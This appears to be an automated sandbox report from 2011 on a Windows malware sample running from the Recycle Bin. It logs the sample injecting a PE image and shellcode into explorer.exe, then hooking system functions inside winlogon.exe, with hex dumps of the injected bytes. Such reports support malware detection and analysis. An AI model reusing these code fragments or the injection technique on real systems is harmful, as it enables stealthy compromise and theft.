Memory attributes changed PID: 2444 Path: C:\Recycle.Bin\B6232F3AC2C.exe Base: 451D90 Length: 2000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2007419367
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\ComputerName\ActiveComputerName Name: ComputerName success or wait 2007420055
Privilege adjusted Privilege: Debug On or off: on success or wait 2007435225
File created Path: C:\Recycle.Bin\ Access: read data or list directory and synchronize Options: directory file and synchronous io non alert and open for backup ident Attributes: normal Content Overwritten: false object name collision 2007435375
Mutant created Name: \BaseNamedObjects\Global\System64 success or wait 2007436346
File opened Path: C:\WINDOWS\system32\kernel32.dll Access: synchronize and generic read Options: synchronous io non alert and non directory file and random access success or wait 2007436654
Section loaded Path: C:\WINDOWS\system32\kernel32.dll Access: query and write and read and execute and extend size Type: image Baseaddress: C20000 Size: 1007616 Protection: readonly Mapped to pid: own pid image not at base 2007436963
Memory attributes changed PID: 2444 Path: C:\Recycle.Bin\B6232F3AC2C.exe Base: C55FA8 Length: 1000 New Protection: page execute and read and write Old Protection: page execute read success or wait 2007437278
Memory allocated PID: 2444 Path: C:\Recycle.Bin\B6232F3AC2C.exe Base: C20000 Length: 12FBF4 Allocation Type: null Protection: page execute and read and write success or wait 2007437540
Section loaded Path: \KnownDlls\WS2_32.dll Access: write and read and execute Type: unknown Baseaddress: C20000 Size: 1007616 Protection: readonly Mapped to pid: own pid object name not found 2007439146
Section loaded Path: C:\WINDOWS\system32\ws2_32.dll Access: query and write and read and execute Type: image Baseaddress: 71AB0000 Size: 94208 Protection: read write Mapped to pid: own pid success or wait 2007439769
Section loaded Path: \KnownDlls\WS2HELP.dll Access: write and read and execute Type: unknown Baseaddress: 71AB0000 Size: 94208 Protection: read write Mapped to pid: own pid object name not found 2007441496
Section loaded Path: C:\WINDOWS\system32\ws2help.dll Access: query and write and read and execute Type: image Baseaddress: 71AA0000 Size: 32768 Protection: read write Mapped to pid: own pid success or wait 2007442109
File opened Path: C:\Recycle.Bin\07A49F015E0D693 Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: false object name not found 2007444606
File opened Path: C:\WINDOWS\system32\kernel32.dll Access: synchronize and generic read Options: synchronous io non alert and non directory file and random access success or wait 2007445059
Section loaded Path: C:\WINDOWS\system32\kernel32.dll Access: query and write and read and execute and extend size Type: image Baseaddress: C70000 Size: 1007616 Protection: readonly Mapped to pid: own pid image not at base 2007445375
Memory attributes changed PID: 2444 Path: C:\Recycle.Bin\B6232F3AC2C.exe Base: CA5FA8 Length: 1000 New Protection: page execute and read and write Old Protection: page execute read success or wait 2007445712
File created Path: C:\Recycle.Bin\07A49F015E0D693 Access: read attributes and synchronize and generic write Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: false success or wait 2007446104
File write Path: C:\Recycle.Bin\07A49F015E0D693 Offset: none Length: 5934 Value: 50 D7 96 D6 A6 EA BF F3 B7 FB 7B 65 8A 85 C9 85 C9 85 C9 85 C9 85 D8 95 D9 95 D3 9F FC B0 5F 82 BC 6E 9B 4E 30 D8 75 A5 B6 46 1F 53 16 3C E9 D5 6F 23 7C CC 40 C7 5F 13 5B 25 68 B6 F4 00 4A FB D0 8B 29 AA 5C 07 EB F8 69 F9 3F A6 F2 9C 1F 0D EA 9E F6 D2 0B 00 8E C4 6C EF 48 BA B7 4B DA AD F9 82 10 28 success or wait 2007449958
File opened Path: C:\WINDOWS\system32\kernel32.dll Access: synchronize and generic read Options: synchronous io non alert and non directory file and random access success or wait 2007451236
Section loaded Path: C:\WINDOWS\system32\kernel32.dll Access: query and write and read and execute and extend size Type: image Baseaddress: C70000 Size: 1007616 Protection: readonly Mapped to pid: own pid image not at base 2007451602
Memory attributes changed PID: 2444 Path: C:\Recycle.Bin\B6232F3AC2C.exe Base: CA5FA8 Length: 1000 New Protection: page execute and read and write Old Protection: page execute read success or wait 2007451843
File opened Path: C:\Recycle.Bin\07A49F015E0D693 Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: false success or wait 2007452225
File read Path: C:\Recycle.Bin\07A49F015E0D693 Offset: none Length: 5934 Value: 50 D7 96 D6 A6 EA BF F3 B7 FB 7B 65 8A 85 C9 85 C9 85 C9 85 C9 85 D8 95 D9 95 D3 9F FC B0 5F 82 BC 6E 9B 4E 30 D8 75 A5 B6 46 1F 53 16 3C E9 D5 6F 23 7C CC 40 C7 5F 13 5B 25 68 B6 F4 00 4A FB D0 8B 29 AA 5C 07 EB F8 69 F9 3F A6 F2 9C 1F 0D EA 9E F6 D2 0B 00 8E C4 6C EF 48 BA B7 4B DA AD F9 82 10 28 success or wait 2007453102
Section loaded Path: \BaseNamedObjects\DBWIN_BUFFER Access: write Type: unknown Baseaddress: C70000 Size: 1007616 Protection: readonly Mapped to pid: own pid object name not found 2007455294
File opened Path: \pipe\globpluginsuninstallpipe Access: read attributes and synchronize and generic write Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false object name not found 2007455482
System info queried Type: ProcessInformation success or wait 2007455804
Section loaded Path: none Access: query and write and read Type: commit Baseaddress: BD0000 Size: 16384 Protection: read write Mapped to pid: own pid success or wait 2007458366
Privilege adjusted Privilege: Debug On or off: on success or wait 2007458916
Memory allocated PID: 1636 Path: C:\WINDOWS\explorer.exe Base: BAD0000 Length: 12F5A8 Allocation Type: null Protection: page execute and read and write success or wait 2007461401
Memory written PID: 1636 Path: C:\WINDOWS\explorer.exe Base: BAD0000 Length: 286720 Value: 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4C 01 02 00 9D 80 86 4E 00 00 00 00 00 00 00 00 E0 00 02 01 0B 01 0A 00 00 26 04 00 00 1E 00 00 00 00 00 00 15 19 02 00 00 10 00 success or wait 2007488830
Memory written PID: 1636 Path: C:\WINDOWS\explorer.exe Base: BADAFFC Length: 13 Value: B8 00 00 EB 0A 50 BA 50 16 AF 0B FF D2 success or wait 2007517280
Memory allocated PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 19E0000 Length: 12F5D8 Allocation Type: null Protection: page execute and read and write success or wait 2007517467
File opened Path: C:\WINDOWS\system32\ntdll.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2007517851
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2007518162
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 4 Value: D0 00 00 00 success or wait 2007518248
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2007518492
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 20 Value: 4C 01 04 00 7D F2 00 4D 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 2007518580
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 224 Value: 0B 01 07 0A 00 D0 07 00 00 3C 03 00 00 00 00 00 F8 20 01 00 00 10 00 00 00 90 07 00 00 00 90 7C 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 0A 00 00 00 00 00 00 20 0B 00 00 04 00 00 30 FD 0A 00 03 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 34 00 00 success or wait 2007518687
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2007518916
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 DA CE 07 00 00 10 00 00 00 D0 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 20 4A 00 00 00 E0 07 00 00 32 00 00 00 D4 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 78 BE 02 00 00 30 08 00 00 C0 02 00 success or wait 2007519005
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2007519184
Section loaded Path: C:\WINDOWS\system32\ntdll.dll Access: query and read Type: commit Baseaddress: BD0000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2007519340
Memory written PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 19E0000 Length: 4096 Value: 64 A1 18 00 00 00 C3 55 8B EC 83 EC 54 83 65 FC 00 64 A1 30 00 00 00 8B 40 0C 8B 40 1C 8B 40 08 68 34 05 74 78 50 E8 83 00 00 00 59 59 89 45 F0 85 C0 74 75 8D 45 AC 89 45 F4 8B 55 F4 C7 02 6B 00 65 00 83 C2 04 C7 02 72 00 6E 00 83 C2 04 C7 02 65 00 6C 00 83 C2 04 C7 02 33 00 32 00 83 C2 04 C7 02 2E 00 64 00 83 C2 04 C7 02 6C 00 6C 00 83 C2 04 83 22 00 8D 45 FC 89 45 EC 8D 45 AC 6A 18 89 45 E8 58 66 89 45 E4 6A 1A 58 66 89 45 E6 8D 45 E4 89 45 F4 8B 45 EC 50 8B 45 F4 50 83 E0 00 50 50 FF 55 F0 89 45 F8 8B 45 FC C9 C3 55 8B EC 51 51 53 8B 5D 08 8B 43 3C 8B 4C 18 78 8B 45 0C C1 E8 10 03 CB 66 85 C0 75 15 0F B7 45 0C 2B 41 10 8B 49 1C 8D 04 81 8B 04 18 03 C3 5B C9 C3 83 65 FC 00 56 8B 71 20 57 8B 79 24 03 F3 03 FB 83 79 18 00 76 3F 8B 06 83 65 F8 00 03 C3 8A success or wait 2007546915
Memory written PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 7C90CFEE Length: 5 Value: E9 BF 33 0D 85 success or wait 2007604325
Process terminated PID: 2444 Path: C:\Recycle.Bin\B6232F3AC2C.exe success or wait 2007604530
+ Sections
+ General
Start time: 05:48:04
Start date: 01/12/2011
Path: C:\WINDOWS\system32\winlogon.exe
Commandline: winlogon.exe
Imagebase: 0x1000000
File size: 507904 bytes
MD5 hash: ED0EF0A136DEC83DF69F04118870003E
File Activities:
+ File opened
File Path Access Options Content overwritten Completion Count Source Address
C:\WINDOWS\system32\ws2_32.dll synchronize and generic read synchronous io non alert and non directory file and random access success or wait 4 BAE1D35
C:\WINDOWS\system32\ntdll.dll read attributes and synchronize and generic read synchronous io non alert and non directory file and random access false success or wait 5 BAD6A36
C:\Recycle.Bin\07A49F015E0D693 read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 2 BAF4E4E
C:\WINDOWS\system32\USER32.dll read attributes and synchronize and generic read synchronous io non alert and non directory file and random access false success or wait 1 BAD6A36
C:\WINDOWS\system32\WININET.dll read attributes and synchronize and generic read synchronous io non alert and non directory file and random access false success or wait 11 BAD6A36
C:\WINDOWS\system32\WS2_32.dll read attributes and synchronize and generic read synchronous io non alert and non directory file and random access false success or wait 1 BAD6A36
C:\WINDOWS\system32\ADVAPI32.dll read attributes and synchronize and generic read synchronous io non alert and non directory file and random access false success or wait 1 BAD6A36
C:\WINDOWS\system32\CRYPT32.dll read attributes and synchronize and generic read synchronous io non alert and non directory file and random access false success or wait 1 BAD6A36
\pipe\globpluginspipe read attributes and synchronize and generic read synchronous io non alert and non directory file false object name not found 4 BADD812
+ File read
File Path Offset Length Value Completion Count Source Address
C:\WINDOWS\system32\ntdll.dll none 4 D0 00 00 00 success or wait 5 BAD6699
C:\WINDOWS\system32\ntdll.dll none 20 4C 01 04 00 7D F2 00 4D 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 5 BAD66D5
C:\WINDOWS\system32\ntdll.dll none 224 0B 01 07 0A 00 D0 07 00 00 3C 03 00 00 00 00 00 F8 20 01 00 00 10 00 00 00 90 07 00 00 00 90 7C 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 0A 00 00 00 00 00 00 20 0B 00 00 04 00 00 30 FD 0A 00 03 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 34 00 00 success or wait 5 BAD6717
C:\WINDOWS\system32\ntdll.dll none 160 2E 74 65 78 74 00 00 00 DA CE 07 00 00 10 00 00 00 D0 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 20 4A 00 00 00 E0 07 00 00 32 00 00 00 D4 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 78 BE 02 00 00 30 08 00 00 C0 02 00 success or wait 5 BAD67A2
C:\Recycle.Bin\07A49F015E0D693 none 5934 50 D7 96 D6 A6 EA BF F3 B7 FB 7B 65 8A 85 C9 85 C9 85 C9 85 C9 85 D8 95 D9 95 D3 9F FC B0 5F 82 BC 6E 9B 4E 30 D8 75 A5 B6 46 1F 53 16 3C E9 D5 6F 23 7C CC 40 C7 5F 13 5B 25 68 B6 F4 00 4A FB D0 8B 29 AA 5C 07 EB F8 69 F9 3F A6 F2 9C 1F 0D EA 9E F6 D2 0B 00 8E C4 6C EF 48 BA B7 4B DA AD F9 82 10 28 success or wait 2 BAE818F
C:\WINDOWS\system32\user32.dll none 4 D8 00 00 00 success or wait 1 BAD6699
C:\WINDOWS\system32\user32.dll none 20 4C 01 04 00 1B A1 02 48 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 1 BAD66D5
C:\WINDOWS\system32\user32.dll none 224 0B 01 07 0A 00 F4 05 00 00 E2 02 00 00 00 00 00 17 B2 00 00 00 10 00 00 00 B0 05 00 00 00 41 7E 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 00 00 00 00 00 00 00 10 09 00 00 04 00 00 76 FC 08 00 02 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 39 00 00 success or wait 1 BAD6717
C:\WINDOWS\system32\user32.dll none 160 2E 74 65 78 74 00 00 00 83 F2 05 00 00 10 00 00 00 F4 05 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 80 11 00 00 00 10 06 00 00 0C 00 00 00 F8 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 88 A0 02 00 00 30 06 00 00 A2 02 00 success or wait 1 BAD67A2
C:\WINDOWS\system32\wininet.dll none 4 F8 00 00 00 success or wait 11 BAD6699
C:\WINDOWS\system32\wininet.dll none 20 4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21 success or wait 11 BAD66D5
C:\WINDOWS\system32\wininet.dll none 224 0B 01 08 00 00 FA 0A 00 00 34 03 00 00 00 00 00 48 17 00 00 00 10 00 00 00 50 0C 00 00 00 93 3D 00 10 00 00 00 02 00 00 06 00 00 00 06 00 00 00 05 00 01 00 00 00 00 00 00 60 0E 00 00 04 00 00 8F D2 0E 00 02 00 40 01 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 F8 18 00 00 success or wait 11 BAD6717
C:\WINDOWS\system32\wininet.dll none 160 2E 74 65 78 74 00 00 00 B0 F9 0A 00 00 10 00 00 00 FA 0A 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 50 68 00 00 00 10 0B 00 00 34 00 00 00 FE 0A 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 C0 61 02 00 00 80 0B 00 00 62 02 00 success or wait 11 BAD67A2
C:\WINDOWS\system32\ws2_32.dll none 4 F0 00 00 00 success or wait 1 BAD6699
C:\WINDOWS\system32\ws2_32.dll none 20 4C 01 04 00 63 A1 02 48 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 1 BAD66D5
C:\WINDOWS\system32\ws2_32.dll none 224 0B 01 07 0A 00 22 01 00 00 1C 00 00 00 00 00 00 73 12 00 00 00 10 00 00 00 20 01 00 00 00 AB 71 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 0A 00 00 00 00 00 00 70 01 00 00 04 00 00 20 F0 01 00 03 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 04 14 00 00 success or wait 1 BAD6717
C:\WINDOWS\system32\ws2_32.dll none 160 2E 74 65 78 74 00 00 00 53 21 01 00 00 10 00 00 00 22 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 14 09 00 00 00 40 01 00 00 0A 00 00 00 26 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 F8 03 00 00 00 50 01 00 00 04 00 00 success or wait 1 BAD67A2
C:\WINDOWS\system32\advapi32.dll none 4 F0 00 00 00 success or wait 1 BAD6699
C:\WINDOWS\system32\advapi32.dll none 20 4C 01 04 00 48 1D 90 49 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 1 BAD66D5
C:\WINDOWS\system32\advapi32.dll none 224 0B 01 07 0A 00 46 07 00 00 3E 02 00 00 00 00 00 0B 71 00 00 00 10 00 00 00 20 07 00 00 00 DD 77 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 00 00 00 00 00 00 00 B0 09 00 00 04 00 00 B8 5B 0A 00 03 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 A4 16 00 00 success or wait 1 BAD6717
C:\WINDOWS\system32\advapi32.dll none 160 2E 74 65 78 74 00 00 00 C9 45 07 00 00 10 00 00 00 46 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 28 46 00 00 00 60 07 00 00 2C 00 00 00 4A 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 80 A9 01 00 00 B0 07 00 00 AA 01 00 success or wait 1 BAD67A2
C:\WINDOWS\system32\crypt32.dll none 4 F0 00 00 00 success or wait 1 BAD6699
C:\WINDOWS\system32\crypt32.dll none 20 4C 01 04 00 D7 A0 02 48 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 1 BAD66D5
C:\WINDOWS\system32\crypt32.dll none 224 0B 01 07 0A 00 44 08 00 00 DC 00 00 00 00 00 00 32 16 00 00 00 10 00 00 00 20 08 00 00 00 A8 77 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 00 00 00 00 00 00 00 50 09 00 00 04 00 00 30 C5 09 00 02 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 9C 1A 00 00 success or wait 1 BAD6717
C:\WINDOWS\system32\crypt32.dll none 160 2E 74 65 78 74 00 00 00 C4 43 08 00 00 10 00 00 00 44 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 E8 23 00 00 00 60 08 00 00 24 00 00 00 48 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 50 67 00 00 00 90 08 00 00 68 00 00 success or wait 1 BAD67A2
+ Other file operations
File Path Disposition Data Ascii Data Completion Count Source Address
C:\WINDOWS\system32\ntdll.dll PositionInformation Offset: 60 success or wait 20 BAD667A
C:\WINDOWS\system32\user32.dll PositionInformation Offset: 60 success or wait 4 BAD667A
C:\WINDOWS\system32\wininet.dll PositionInformation Offset: 60 success or wait 44 BAD667A
C:\WINDOWS\system32\ws2_32.dll PositionInformation Offset: 60 success or wait 4 BAD667A
C:\WINDOWS\system32\advapi32.dll PositionInformation Offset: 60 success or wait 4 BAD667A
C:\WINDOWS\system32\crypt32.dll PositionInformation Offset: 60 success or wait 4 BAD667A
Section Activities:
+ Section loaded by Windows
File Path Access Type Base Size Mapped to pid Protection Completion Count
C:\WINDOWS\system32\msctf.dll write and read and execute commit 14E0000 299008 own pid execute success or wait 1
C:\WINDOWS\system32\msctf.dll write and read and execute commit 15E0000 299008 own pid execute success or wait 1
C:\WINDOWS\system32\mswsock.dll write and read and execute commit 15E0000 245760 own pid execute success or wait 1
C:\WINDOWS\system32\mswsock.dll query and write and read and execute image 71A50000 258048 own pid read write success or wait 1
\KnownDlls\hnetcfg.dll write and read and execute unknown 71A50000 258048 own pid read write object name not found 1
C:\WINDOWS\system32\hnetcfg.dll query and write and read and execute image 662B0000 360448 own pid read write success or wait 1
C:\WINDOWS\system32\msctf.dll write and read and execute commit 15E0000 299008 own pid execute success or wait 1
C:\WINDOWS\system32\wshtcpip.dll write and read and execute commit A60000 20480 own pid execute success or wait 1
C:\WINDOWS\system32\wshtcpip.dll query and write and read and execute image 71A90000 32768 own pid read write success or wait 1
\KnownDlls\DNSAPI.dll write and read and execute unknown 71A90000 32768 own pid read write object name not found 1
C:\WINDOWS\system32\dnsapi.dll query and write and read and execute image 76F20000 159744 own pid read write success or wait 1
C:\WINDOWS\system32\winrnr.dll write and read and execute commit A40000 20480 own pid execute success or wait 1
C:\WINDOWS\system32\winrnr.dll query and write and read and execute image 76FB0000 32768 own pid read write success or wait 1
\KnownDlls\rasadhlp.dll write and read and execute unknown 76FB0000 32768 own pid read write object name not found 1
C:\WINDOWS\system32\rasadhlp.dll query and write and read and execute image 76FC0000 24576 own pid read write success or wait 1
C:\WINDOWS\system32\msctf.dll write and read and execute commit 15E0000 299008 own pid execute success or wait 1
C:\WINDOWS\system32\msctf.dll write and read and execute commit 15E0000 299008 own pid execute success or wait 1
C:\WINDOWS\system32\msctf.dll write and read and execute commit 1620000 299008 own pid execute success or wait 1
C:\WINDOWS\system32\msctf.dll write and read and execute commit 1620000 299008 own pid execute success or wait 1
C:\WINDOWS\system32\msctf.dll write and read and execute commit 15E0000 299008 own pid execute success or wait 1
C:\WINDOWS\system32\msctf.dll write and read and execute commit 15E0000 299008 own pid execute success or wait 1
+ Section loaded by program
File Path Access Type Base Size Mapped to pid Protection Completion Count Source Address
\KnownDlls\WININET.dll write and read and execute unknown 3D930000 942080 own pid read write success or wait 1 BAE50FD
\KnownDlls\Normaliz.dll write and read and execute unknown A80000 36864 own pid read write conflicting addresses 1 BAE50FD
\KnownDlls\urlmon.dll write and read and execute unknown 78130000 1257472 own pid read write success or wait 1 BAE50FD
\KnownDlls\iertutil.dll write and read and execute unknown 3DFD0000 2002944 own pid read write success or wait 1 BAE50FD
\KnownDlls\MSIMG32.dll write and read and execute unknown 14E0000 299008 own pid execute object name not found 1 BAE50FD
C:\WINDOWS\system32\msimg32.dll query and write and read and execute image 76380000 20480 own pid read write success or wait 1 BAE50FD
C:\WINDOWS\system32\ntdll.dll query and read commit 1420000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\ntdll.dll query and read commit 1520000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\ntdll.dll query and read commit 1520000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\ntdll.dll query and read commit 1520000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\ntdll.dll query and read commit 1520000 65536 own pid readonly success or wait 1 BAD6A8A
\KnownDlls\nspr4.dll write and read and execute unknown 1520000 65536 own pid readonly object name not found 1 BAF1523
C:\WINDOWS\system32\user32.dll query and read commit 1520000 57344 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit 1520000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit 1520000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit 1520000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit 1520000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit 1520000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit 1520000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit 1520000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit 1520000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit 1520000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit 1520000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit 1520000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\ws2_32.dll query and read commit 1520000 20480 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\advapi32.dll query and read commit 1520000 28672 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\crypt32.dll query and read commit 1520000 77824 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\ws2_32.dll query and write and read and execute and extend size image A40000 94208 own pid readonly image not at base 1 BAE1D35
C:\WINDOWS\system32\ws2_32.dll query and write and read and execute and extend size image A50000 94208 own pid readonly image not at base 1 BAE1D35
C:\WINDOWS\system32\ws2_32.dll query and write and read and execute and extend size image A50000 94208 own pid readonly image not at base 1 BAE1D35
C:\WINDOWS\system32\ws2_32.dll query and write and read and execute and extend size image A50000 94208 own pid readonly image not at base 1 BAE1D35
Mutant Activities:
+ Mutant created
Name Completion Count Source Address
\BaseNamedObjects\zXeRY3a_PtW|00000000 success or wait 1 A306B4
\BaseNamedObjects\Global\25LSmN0q5Cx8k1GCFvMKe5z0i3US0DM success or wait 1 BAE0EF7
Thread Activities:
+ Thread created
TID PID EIP Injected Filepath Completion Count Source Address
2296 636 7C8106F9 false C:\WINDOWS\system32\winlogon.exe success or wait 1 A30639
2252 636 7C8106F9 false C:\WINDOWS\system32\winlogon.exe success or wait 1 BAD6140
556 636 7C8106F9 false C:\WINDOWS\system32\winlogon.exe success or wait 1 BAD6140
2008 636 7C8106F9 false C:\WINDOWS\system32\winlogon.exe success or wait 1 BAD6140
2448 636 7C8106F9 false C:\WINDOWS\system32\winlogon.exe success or wait 1 BAD6140
2436 636 7C8106F9 false C:\WINDOWS\system32\winlogon.exe success or wait 1 BAD6140
2568 636 7C8106F9 false C:\WINDOWS\system32\winlogon.exe success or wait 1 BAD6140
1388 636 7C8106F9 false C:\WINDOWS\system32\winlogon.exe success or wait 1 BAD6140
284 636 7C8106F9 false C:\WINDOWS\system32\winlogon.exe success or wait 1 BAD6140
3500 636 7C8106F9 false C:\WINDOWS\system32\winlogon.exe success or wait 1 BAD6140
+ Thread delayed
TID Delay Completion Count Source Address
8786 0s success or wait 945 BAED21A
+ Thread terminated
TID PID Completion Count Source Address
2296 636 success or wait 0 A30279
Memory Activities:
+ Memory attributes changed
PID Filepath Base Length New Protection Old Protection Completion Count Source Address
636 C:\WINDOWS\system32\winlogon.exe 7C90CFEE 2000 page execute and read and write page execute and read and write success or wait 1 A305EC
636 C:\WINDOWS\system32\winlogon.exe 7C90D76E 2000 page execute and read and write page execute and write copy success or wait 1 BAE95DC
636 C:\WINDOWS\system32\winlogon.exe 7C90D76E 2000 page execute and read and write page execute and read and write success or wait 1 BAF2C8B
636 C:\WINDOWS\system32\winlogon.exe BAF6E20 2000 page execute and read and write page execute and read and write success or wait 1 BAF2C8B
636 C:\WINDOWS\system32\winlogon.exe 7C90DF1E 2000 page execute and read and write page execute and read and write success or wait 2 BAE95DC
636 C:\WINDOWS\system32\winlogon.exe BB10A90 2000 page execute and read and write page execute and read and write success or wait 1 BAF2CA1
636 C:\WINDOWS\system32\winlogon.exe 7C90DC5E 2000 page execute and read and write page execute and read and write success or wait 2 BAE95DC
636 C:\WINDOWS\system32\winlogon.exe BAFF2F8 2000 page execute and read and write page execute and read and write success or wait 1 BAF2CB7
636 C:\WINDOWS\system32\winlogon.exe 7C90D2EE 2000 page execute and read and write page execute and read and write success or wait 2 BAE95DC
636 C:\WINDOWS\system32\winlogon.exe BAFCF58 2000 page execute and read and write page execute and read and write success or wait 1 BAF2CCD
636 C:\WINDOWS\system32\winlogon.exe 7C90DB3E 2000 page execute and read and write page execute and read and write success or wait 2 BAE95DC
636 C:\WINDOWS\system32\winlogon.exe BB10168 2000 page execute and read and write page execute and read and write success or wait 1 BAF2D09
636 C:\WINDOWS\system32\winlogon.exe 7E418BF6 2000 page execute and read and write page execute read success or wait 1 BAE95DC
636 C:\WINDOWS\system32\winlogon.exe 7E418BF6 2000 page execute and read and write page execute and read and write success or wait 1 BAED314
636 C:\WINDOWS\system32\winlogon.exe BAFC210 2000 page execute and read and write page execute and read and write success or wait 1 BAED314
636 C:\WINDOWS\system32\winlogon.exe 3D949088 2000 page execute and read and write page execute read success or wait 1 BAE95DC
636 C:\WINDOWS\system32\winlogon.exe 3D949088 2000 page execute and read and write page execute and read and write success or wait 1 BAF138F
